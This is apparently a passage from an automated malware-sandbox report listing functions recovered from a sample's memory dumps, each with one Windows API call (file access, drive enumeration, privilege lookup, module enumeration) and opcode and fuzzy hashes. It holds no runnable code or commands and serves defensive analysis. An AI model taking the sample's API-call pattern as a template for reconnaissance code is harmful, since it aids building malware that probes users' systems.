                                                    • Instruction Fuzzy Hash: D82172B16053C09FE722CF29DC44B52FFA8EF46610F0885AAED89CB253D265E404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028810D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 1b3bdcd993650f024aaaf810df9b6cd90b40fe449009feeeaa1ab9cb86373eb7
                                                    • Instruction ID: e21072e287ef60f0106d5c9c34e693a0601ab1715b0b00014dd994b2acbf59f8
                                                    • Opcode Fuzzy Hash: 1b3bdcd993650f024aaaf810df9b6cd90b40fe449009feeeaa1ab9cb86373eb7
                                                    • Instruction Fuzzy Hash: 87219D6940D3C09FD7138B258C54A62BFB4EF57620F0980CBDCC88F2A3D6296809C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 30841c67264ef83cd6d07860a49777b6d4f5cc63ac88f0dc1a39210790b33343
                                                    • Instruction ID: dcb56e68559d501cd5561a246f8625b44f1b01d23690acdbe947ac4ba2e8e4e0
                                                    • Opcode Fuzzy Hash: 30841c67264ef83cd6d07860a49777b6d4f5cc63ac88f0dc1a39210790b33343
                                                    • Instruction Fuzzy Hash: F1110172500300EFEB21DF55DC85BA6FBA8EF44320F04856AED49CB285C671A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1611157ba7b6071fbac4d9f778d5b8d9c3be74e8b3c7186d90d26527e06d13f2
                                                    • Instruction ID: 55754ca05f448352221cf0e25be82ab1a15a571844ed30b7635db43ab4aef81d
                                                    • Opcode Fuzzy Hash: 1611157ba7b6071fbac4d9f778d5b8d9c3be74e8b3c7186d90d26527e06d13f2
                                                    • Instruction Fuzzy Hash: C7110E7A400304EFFB21DF51DC80FA6FBA8EF04321F04856AED48DA241C270A908CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F1BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 0ae3e58be1a0077681571bf8220d773f861c661352b401878f2ed6fa8441b7f6
                                                    • Instruction ID: 23d2dec56e5bcf49da7292a9504dfa4ccd854691c27e826d55b3348d2aca2b08
                                                    • Opcode Fuzzy Hash: 0ae3e58be1a0077681571bf8220d773f861c661352b401878f2ed6fa8441b7f6
                                                    • Instruction Fuzzy Hash: D6115C72504384EFDB22CF65DC45A52FFF4EF05210F08859AED898B662D375A418DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028812D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: b857923f7270f2ebb9017724e543de43fcadba43f7086c5045a57dace2fd6529
                                                    • Instruction ID: ece8dc0dcb6a4f0ca2200f78011055db44a02a310212f61be6541522c74f854b
                                                    • Opcode Fuzzy Hash: b857923f7270f2ebb9017724e543de43fcadba43f7086c5045a57dace2fd6529
                                                    • Instruction Fuzzy Hash: DD11C1755083809FDB118F25DC49B96FFA4EF06220F0884EEED898B252D339A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01F1A39C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 460eab773cfe978fadb62614cf2b6d2febb1cea6cca49d73b41909848d0f4863
                                                    • Instruction ID: 77314773849cc873686f93aec63efb043d3a712229e1d76ebe030575cc78a188
                                                    • Opcode Fuzzy Hash: 460eab773cfe978fadb62614cf2b6d2febb1cea6cca49d73b41909848d0f4863
                                                    • Instruction Fuzzy Hash: E1116D715093C09FE7128B15DC54B62BFB4DF47614F0880CAEDC48F253D266A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028805E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: a2126801110baf1a513b690e333dac7e5ee8c17700ed783f8f1ee95180f4ad89
                                                    • Instruction ID: ff2ec03e246843baa382778adfd6a06d6fbbdc4b831eda40a279645ee4abcffa
                                                    • Opcode Fuzzy Hash: a2126801110baf1a513b690e333dac7e5ee8c17700ed783f8f1ee95180f4ad89
                                                    • Instruction Fuzzy Hash: B511C2755093C09FDB128B15DC95B52FFB4EF42220F0880DBED898B663D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 67e0a0cbba2d519d05fcfc72d55342074594f8e6a796325fcfb36f9457d8261a
                                                    • Instruction ID: 9b5574c31b8b98fe937288c9f98d9e3727db6a1e0910dd65601b10311d199830
                                                    • Opcode Fuzzy Hash: 67e0a0cbba2d519d05fcfc72d55342074594f8e6a796325fcfb36f9457d8261a
                                                    • Instruction Fuzzy Hash: 0E1190755093C09FE7228B25DC55B92FFA4EF07324F0981DADD888B163C265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F1AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: ffb3b9b333368925f4a7ccb1b398288e794964e35f3c7f3a283a88aff259fb89
                                                    • Instruction ID: d9e3129bc6e98887171470328f4a6e917ac98685049fe306d61e5434ee4fa644
                                                    • Opcode Fuzzy Hash: ffb3b9b333368925f4a7ccb1b398288e794964e35f3c7f3a283a88aff259fb89
                                                    • Instruction Fuzzy Hash: 2211A1B2A01380CFEB20CF29DC85B56FBE8EF04621F08C46ADD49CB646D675E404CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01F1AA71
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: a991eacb599a37bec86fc228a2861c0ee62923f3b57a75a539f65ba959e79be8
                                                    • Instruction ID: a756b230b4c81c81bada6bf6ad7814f1bdb05b567b5f0f7554de7437cf59fd64
                                                    • Opcode Fuzzy Hash: a991eacb599a37bec86fc228a2861c0ee62923f3b57a75a539f65ba959e79be8
                                                    • Instruction Fuzzy Hash: DD11A37690D7C09FD7128B15DC85B91BFB4EF03224F0980DBDD858F163D269A909D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028807C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 4f2a331017e81b69fe8734397cbc696a1d765682d44aa11d9539101c6a568d6d
                                                    • Instruction ID: fa0c7aafe24730f23aa6a3a39c654eacd6b1745313ccb949fff634a84647f519
                                                    • Opcode Fuzzy Hash: 4f2a331017e81b69fe8734397cbc696a1d765682d44aa11d9539101c6a568d6d
                                                    • Instruction Fuzzy Hash: 4501D279500704EFFB20DF01DC85FA6FB98DF44721F14C19AED089B241D674A948CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028813AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: fe58e47818fbdb014be0849ee7e33cbe9d691f560c99d1fb5e46cf1a2924ef0f
                                                    • Instruction ID: ddae8576c0e4f0ffaf4d9cb5378e3b70ef55d362eada629a4b24393881726759
                                                    • Opcode Fuzzy Hash: fe58e47818fbdb014be0849ee7e33cbe9d691f560c99d1fb5e46cf1a2924ef0f
                                                    • Instruction Fuzzy Hash: 9B118E79500700DFEB20DF56DC89B66FBA4EF04620F08C4AADD49CB652D775E409CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01F1ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 32b488d33e20bba0998164d6fa77a2f81fe34df82e49da9af097923f7ef696c6
                                                    • Instruction ID: 8fe87fb764f0ae1ec9e9f72c2a52aa9e1309e7b0623ea69cab4c7db66e5c0327
                                                    • Opcode Fuzzy Hash: 32b488d33e20bba0998164d6fa77a2f81fe34df82e49da9af097923f7ef696c6
                                                    • Instruction Fuzzy Hash: BB118EB59097C09FDB11CF65EC85B92FFA4EF42224F0984ABDD888F253D275A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01F1BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 4deb66738df196d7122912f69c386e6e900dd22ec3ab42cd8a5174a26eef335c
                                                    • Instruction ID: 793e31ada750aa292d4b23dc14777f68df75fe6921c5a77538aa247903858e1f
                                                    • Opcode Fuzzy Hash: 4deb66738df196d7122912f69c386e6e900dd22ec3ab42cd8a5174a26eef335c
                                                    • Instruction Fuzzy Hash: 76118E72900700DFEB21CF55DC44B52FFF4EF08611F0885AADD898A616D372E414DBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 73c2d70c5eb3455bf20001fb6f42bbc7ec783e3fe507e759a24d2d64aa5c8396
                                                    • Instruction ID: 46b7260f0ee26abfdf53d4970a787ae48d0aebe14cc084c814669af926742a70
                                                    • Opcode Fuzzy Hash: 73c2d70c5eb3455bf20001fb6f42bbc7ec783e3fe507e759a24d2d64aa5c8396
                                                    • Instruction Fuzzy Hash: 50019E79600344CFEB20EF66DC85766FB98EB00225F0884AADC49CB642D774E408CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: b9525acecb94f383576d33564e0d7bd43cc3b3b46acbc4c2e9ba6b77b270d31d
                                                    • Instruction ID: 81b79a645ac03e77626d36f31744be1fc266f2f47fb80e7254b7ac265d65f0cd
                                                    • Opcode Fuzzy Hash: b9525acecb94f383576d33564e0d7bd43cc3b3b46acbc4c2e9ba6b77b270d31d
                                                    • Instruction Fuzzy Hash: 28018471900600AFE310DF16DC46B66FBA8FB84B60F14816AED089B741D335F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F1A23E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 735cd788144d46979d6fa9694bc05f1f67312db841ce0fa2f26b52f3cbe18126
                                                    • Instruction ID: 918b2b65fae794d9a4ac8386ea2da2f083361092a23fe8d474aa1db5c04d01f0
                                                    • Opcode Fuzzy Hash: 735cd788144d46979d6fa9694bc05f1f67312db841ce0fa2f26b52f3cbe18126
                                                    • Instruction Fuzzy Hash: 08018471900600AFE310DF16DC46B66FBA8FB84A60F14816AED089B741D335F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028812FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0288132F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 9af4b9f2844d28b2dcd828c5c24bf065a6f0afcbf10203bf93435fb2b7efd7bf
                                                    • Instruction ID: 89658e32ba8c3175a3bc42e174e218d5163268dba2a88f6fb410ddaa323f84e6
                                                    • Opcode Fuzzy Hash: 9af4b9f2844d28b2dcd828c5c24bf065a6f0afcbf10203bf93435fb2b7efd7bf
                                                    • Instruction Fuzzy Hash: 9B01BC79900340DFEF209F15D8897A5FBA4EF04621F08C4AADC49CBA42D679A404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F1BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 0ec7618f0ddb97e360e179f97bdccbccea9869973db6e489f00abe95056696fb
                                                    • Instruction ID: a2ec7049a5241ea752213957c3169d4989bd5e3270d58b443dc6e67ecf392ef4
                                                    • Opcode Fuzzy Hash: 0ec7618f0ddb97e360e179f97bdccbccea9869973db6e489f00abe95056696fb
                                                    • Instruction Fuzzy Hash: 7C01DF76900240DFEB20CF19DC857A5FBA4FF04620F08C4AADD498BA5AD276A804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028804B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: d77cb7901981f153f1af68ba2785fa034befbd3f8573780ede720a3e672d62a7
                                                    • Instruction ID: 0472d88277a46d3e31deb98b2e6aa594aa2f850b14bee1291f676a7fa66f29db
                                                    • Opcode Fuzzy Hash: d77cb7901981f153f1af68ba2785fa034befbd3f8573780ede720a3e672d62a7
                                                    • Instruction Fuzzy Hash: 12016271900600ABD310DF16DC46B26FBA4FB88B20F14825AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 32945b1b5c478f18868227e1e55b874b8dde667a979ca5823da9690a85f4e571
                                                    • Instruction ID: 84aa6b2f12687827b991609bbd11ff054f7b78d3540feaf01b5ea59f8626aa63
                                                    • Opcode Fuzzy Hash: 32945b1b5c478f18868227e1e55b874b8dde667a979ca5823da9690a85f4e571
                                                    • Instruction Fuzzy Hash: B9018F79904344DFEB20EF56D885B66FB94EF00665F08C4AADD48CF686D375E408CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A8FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F1A94A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    • Opcode ID: d1dfd36d466524ed2f1dc1a9b2c50246c00a7968360ea33b23d6f6a330bed28e
                                                    • Instruction ID: e4dc11006aeef00f79ee4ade5d38cddd12f812cf066d25a547ea04a130f75a16
                                                    • Opcode Fuzzy Hash: d1dfd36d466524ed2f1dc1a9b2c50246c00a7968360ea33b23d6f6a330bed28e
                                                    • Instruction Fuzzy Hash: 21018671900600ABD310DF16DC46B26FBB4FB88B20F14825AED085B741D375F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02880640
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: c3bafc7ef5cbcf315e76fefe58857863aa11f24553e268d73e41e79b4f859af5
                                                    • Instruction ID: 7f0eafbaa6fbd77d05895bf8a2241f7b875663f8cf7b7c53a05a7f89f7c9c390
                                                    • Opcode Fuzzy Hash: c3bafc7ef5cbcf315e76fefe58857863aa11f24553e268d73e41e79b4f859af5
                                                    • Instruction Fuzzy Hash: 8C01FF79A00744CFEB20DF16DC85761FBA0EF41625F08C1AADC4A8B752D374E808CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01F1ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: fb6c5641ccb3ae189ba48f3d962d8b5b077ea6c5eb9ff772c63e7e8092546957
                                                    • Instruction ID: 3647260da63520361fd0bfe907b1b4d9dea48253d463515cde412e97b216b261
                                                    • Opcode Fuzzy Hash: fb6c5641ccb3ae189ba48f3d962d8b5b077ea6c5eb9ff772c63e7e8092546957
                                                    • Instruction Fuzzy Hash: 9B01F431905780CFEB10DF5ADC85791FB94EF00221F08C4ABCD488F206D376A404CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02881116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02881148
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 3cdf94bd2584be349ad696fd2251530098842ab050ddd43930edfd9a2e83e36b
                                                    • Instruction ID: 1621c63ed7e87f910aea5330d6fbe675c6df3e9b743a85a43c1654516ab616bc
                                                    • Opcode Fuzzy Hash: 3cdf94bd2584be349ad696fd2251530098842ab050ddd43930edfd9a2e83e36b
                                                    • Instruction Fuzzy Hash: 76F0FF3C500744DFEB20DF05D889771FBA0EF00A21F08C19ACC4D8B712CA79A444CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0288099C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: f345e4b6078b281952aa043a709cbf6cafc69fa32a69a3d0eda3f0123b16fb4e
                                                    • Instruction ID: 9cddbcde43c3acc973ed9a045548b333f388406f1b9caa81f997b27fd269d6f0
                                                    • Opcode Fuzzy Hash: f345e4b6078b281952aa043a709cbf6cafc69fa32a69a3d0eda3f0123b16fb4e
                                                    • Instruction Fuzzy Hash: C7F0C23D904744DFEB20EF06DC85765FBA0EF14726F08C19ADD898B716D375A408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01F1A39C
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 0039825cc4026aec766574eaa42e21414b1938d451fc27e7d4e8893e6036c9d2
                                                    • Instruction ID: 2fbe1b766719a974df2e41105eaa84705bede4737f047944830245d78f315667
                                                    • Opcode Fuzzy Hash: 0039825cc4026aec766574eaa42e21414b1938d451fc27e7d4e8893e6036c9d2
                                                    • Instruction Fuzzy Hash: 19F0C235905780DFEB20DF06D885765FBA0EF04721F08C19ADD494B716D3B6A404DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01F1AA71
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 393c0d1d25c9666448233714956fe5e67b1a348b7b1ae8465c7372a859e59ac0
                                                    • Instruction ID: d9a82e51c4eecdb082c4045d5bca2653e6c0633b00919e66f7f76afb6854c909
                                                    • Opcode Fuzzy Hash: 393c0d1d25c9666448233714956fe5e67b1a348b7b1ae8465c7372a859e59ac0
                                                    • Instruction Fuzzy Hash: E2F0F032901780CFEB20CF0AD989761FBA0EF04621F48C0DADD498F746D27AA504CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01F1A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: f72e34f61ce7913e467d2b7d687167d4f2a7f56f67bd8ac03507f41b20c57ab2
                                                    • Instruction ID: b179939bba654459638f06bbb6001d50c8f3d570eb340ba9d4f84268e3ef9e65
                                                    • Opcode Fuzzy Hash: f72e34f61ce7913e467d2b7d687167d4f2a7f56f67bd8ac03507f41b20c57ab2
                                                    • Instruction Fuzzy Hash: 9F1191755093C0DFD712CB25DD45B92FFA4EF42220F0980ABED858B252D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01F1A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 76b479e01b05d11d5a006e66e8751fd2de095fc291d9f278f12755d280e2d56a
                                                    • Instruction ID: 375091f1ab6e8c21453ee4cec7ce651a43beaab740a5305a25986067068cc00d
                                                    • Opcode Fuzzy Hash: 76b479e01b05d11d5a006e66e8751fd2de095fc291d9f278f12755d280e2d56a
